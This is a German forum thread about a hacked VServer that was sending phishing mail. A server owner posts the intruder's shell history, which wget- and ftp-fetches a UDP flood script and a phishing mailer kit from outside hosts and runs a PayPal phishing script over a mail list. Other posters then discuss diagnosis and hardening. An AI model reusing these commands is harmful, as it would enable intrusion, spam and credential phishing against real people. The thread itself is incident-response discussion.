Phishing über Netclusive VServer

[Wildcat]

Nachdem mein VServer das zweite mal recht langsam war und nach einem Neustart nur noch über Virtuozzo ansprechbar war, hatte ich mich an den Support gewendet, dieser schickte mir dann:

ich weiß ja nicht, was genau sie auf dem System veranstalten, jedoch sieht dies nicht wirklich legal aus:

wget roshells.100free.com/udp.pl
ftp roshells.100free.com
ls -a
rm -rf .bash bash.tar
wget roshells.100free.com/udp.pl
ftp roshells.100free.com
w
echo lol | mail non@2d.com
echo lol | mail non@2d.com
cd /tmp/" "
ftp roshells.100free.com
tar xvf send.tar
rm -rf send.tar
cd .send/
ls -a
cat msg.txt
pico msg.txt
cd ..
wget http://geocities.com/cclegit/unsenderamazon.tgz
tar xvf unsenderamazon.tgz
rm -rf unsenderamazon.tgz
cd mail
ls -a
pico test.txt
ls -a
pico list.txt
php -f paypal.php
rm -rf list.txt
wget http://www.chapeugames.bananaweb.com.br/fdps/sssste.txt
mv sssste.txt list.txt
wc -l list.txt

Allerdings habe ich diese dinge nicht ausgeführt, da ich Server neuling bin und der Support auch nur sagte ich solle doch meine Log's prüfen, suche ich nun hier hilfe.

Es wird aufjedenfall eine Amazon Fake Mail versendet und hächstwahrscheinlich PW's des Server's, allerdings ist kein SSH Zugriff mehr möglich, nur die Virtuozzo Oberfläche funktioniert.

Hoffe das mir jemand sagen kann was das genau gemacht hat, der Server wird durch Netclusive in den nächsten Tagen resettet.
Der Server wurde soweit in der Standartkonfiguration Betrieben und nichts wesentliches geändert.

 

[MrMasterJPsy]

Rescue booten und Logdateien sichern und durchgehen...

...und dann wird da wohl ne Neuinstallation anstehen.


Cu JPsy

 

[Wildcat]

Schonmal was von psybnc gehört? weil das ist das was da installiert wurde.

Mhm wie ich gerade gelesen hab ist das ein Bouncer.
Mhm also doch noch mehr als ich vermutet habe....

 

[Freez]

Dein Server wurde gehackt!!! Wahrscheinlich über eine php-Lücke (Forum, CMS, etc.)

Setze ihn SCHNELLSTMÖGLICH neu auf, damit du nicht weiteren Ärger bekommst!!!

 

[Wildcat]

Das er gehackt wurde weiß ich^^
Komischerweise kümmerts den Support nicht sehr.

Der Server war in ner Standartkonfi und ich wollte nach meinen Urlaub erst anfangen, da war es aber schon.

Ich wollte nur paar nähere Infos ob über das da oben jemand paar Infos hat, was näheres weiß.

Aufjedenfall wurde ein neuer Benutzer angelegt. Emil :roll: von irgendnem derjenige ist über einen Asiatischen Internetprovider reingegangen, vlt selber ein Asiate keine Ahnung, nur das es den Support nicht weiter stört, scheinbar sollte es eine Lücke in der Standart VServer Konfiguration sein, die jeder Benutzer damit bekommt.

Der Server wird neu Aufgesetzt von Netclusive, derzeit läuft er im Reparaturmodus und sendet keine Phishing Mails mehr, den Benutzer und bestandteile davon habe ich gelöscht, log's aufbewahrt.

Mich interessiert ob man herausfinden kann wo genau Sie eingedrungen sind, da ich mich mit Servern noch nicht wirklich auskenne.

 

[Nicolas]

-- Falscher Thread --

 

[tty0]

1. Den Support muss es auch nicht jucken, du hast keinen Managed Server, du alleine bist für die Sicherheit etc verantwortlich udn du kannst dafür haftbar gemacht werden.
2. Dies ist eine der Sachend ie ich immer wieder predige, Leute die keine Ahnung von der Materie haben aber meinen es ist ja "kewl" sich nen Server zuzulegen.
3. Freez: Was sollte diesder sinnlose Thread? Und was hat das für nen Sinn den Server einfach neu aufzusetzen? Gar keine. Es hätte mehr Sinn den die Logs zuerstmal zu anallysieren damit man erkennt wie der Angreifer in das System gekommen ist. So wie es Wildcat gemacht hat.
4. Wildcat, schau dir die Logdateien an, evtl findet sich da was. Damit man die Anhaltspunkte geben könnte, wäre evtl. interessant welche Software du alles auf dem Server zusätzlich installiert hast. Wenn du nix installiert hast, dann wäre es interessant was in dem Standardtemplate alles drinnen ist, evtl acuh mit Versionsnummern.

Regards,
Thilo

 

[Freez]

3. Freez: Was sollte diesder sinnlose Thread? Und was hat das für nen Sinn den Server einfach neu aufzusetzen? Gar keine. Es hätte mehr Sinn den die Logs zuerstmal zu anallysieren damit man erkennt wie der Angreifer in das System gekommen ist. So wie es Wildcat gemacht hat.

Ja, ich denke auch, daß es deutlich schlauer ist, den Server erstmal so weiterlaufen zu lassen, damit der freundliche Asiate weiterhin tausende Mails versenden kann bis man die Lücke gefunden hat.
Ach doch nicht?
Na, dann aber schnellstmöglich nen neues Image (der Ruhe willen).

Und das Netclusive da völlig raus ist, halte ich für nen Gerücht. Macht keinen guten Eindruck in der Presse schon standardmässig Server mit grossen Lücken auszuliefern...

 

[Wildcat]

Sie sind über ne Lücke im SSH reingekommen, soviel scheint festzustehen.

Was danach passiert ist, waren halt, wer weiß wieviele mails, glaube nicht mehr das es sich nur im tausender bereich bewegt.
Es wurde eine eigene kleine Linuxversion aufgespielt, ein Bouncer, der PsyBNC.

Nunja die Log's hatte ich nun soweit gesichert, den Server platt machen lassen, SSH1 verboten und nur noch Login per SSH2, SSH2 ist nun mit Private/Public Keyverfahren abgesichert, der Login über root + pw funktioniert nicht mehr.
Den Port hab ich auch geändert, das Auth.log freut sich *g*.

Auf dem Server läuft Debian, das hab ich nun geupdatet, sowie sicherheitsfixes für Confixx eingespielt.

Soweit scheint erstmal alles zu laufen, in dem Zustand hab ich mir jetzt ein Backup gemacht, sollte irgendwann wieder mal was sein, muss ich den Support net belästigen.

Und es sieht wirklich nicht gut aus, wenn man so leicht auf einen VServer kommt, da muss ich ihm recht geben, wobei auch in den AGB's steht, das du allein für die Sicherheit deines VServer's verantwortlich bist.
Mit der rechtlichen Seite, wäre das sicherlich ein großer streitfaktor.

 

[tty0]

Ja, ich denke auch, daß es deutlich schlauer ist, den Server erstmal so weiterlaufen zu lassen, damit der freundliche Asiate weiterhin tausende Mails versenden kann bis man die Lücke gefunden hat.
Ach doch nicht?
Na, dann aber schnellstmöglich nen neues Image (der Ruhe willen).

Und das Netclusive da völlig raus ist, halte ich für nen Gerücht. Macht keinen guten Eindruck in der Presse schon standardmässig Server mit grossen Lücken auszuliefern...

Leg mir bitte nicht Sachen in den Mund Und zu netclusive: Zeig mri einen Provider der *immer* die aktuellsten Templates hat.
Und was bringt es dir ein Image einzuspielen in dem die Lücke immer noch ist die der freundlcihe Asiate (wobei das meistens auch nur gehackte Rechner sind) direkt wieder ausnutzen kann? Das sind für den Spammer 2 min mehr Arbeit und schon aht er sein Relay wieder

Ich habe nicht gesagt das es besser ist den Server direkt so weiterlaufen zu lassen. Es ist am besten den Server vom Netz zu nehmen und dann zuerst einmal die Logs auszuwerten. Wenn man keinen direkten Zugriff auf die Hardware o.ä. hat reicht auch die schon genannte Rettungskonsole

Regards,
Thilo

 

[DeNiro]

Also wo ihr da ein Bouncer seht weis ich nicht und schon gar nicht ein Amazon Fake.
Das ist ein Typischer spammer der Mails versendet um Kredikartendaten zu bekommen, in dem Fall alles ueber eine Fake Page von Paypal.

Der hat sich sein PhPmailer installiert, die Mailliste geholt den scam aufgesetzt, und dann hat er auf die Passwoerter in ruhe gewartet.

Und wenn doch ein Bouncer drauf war was man hier nicht sieht, dann hat er dein server schon laengere Zeit in seiner macht und ist ueber den Bouncer voellig Anonym ins IRC, nur darum setzten die ueberhaupt Bouncer ein.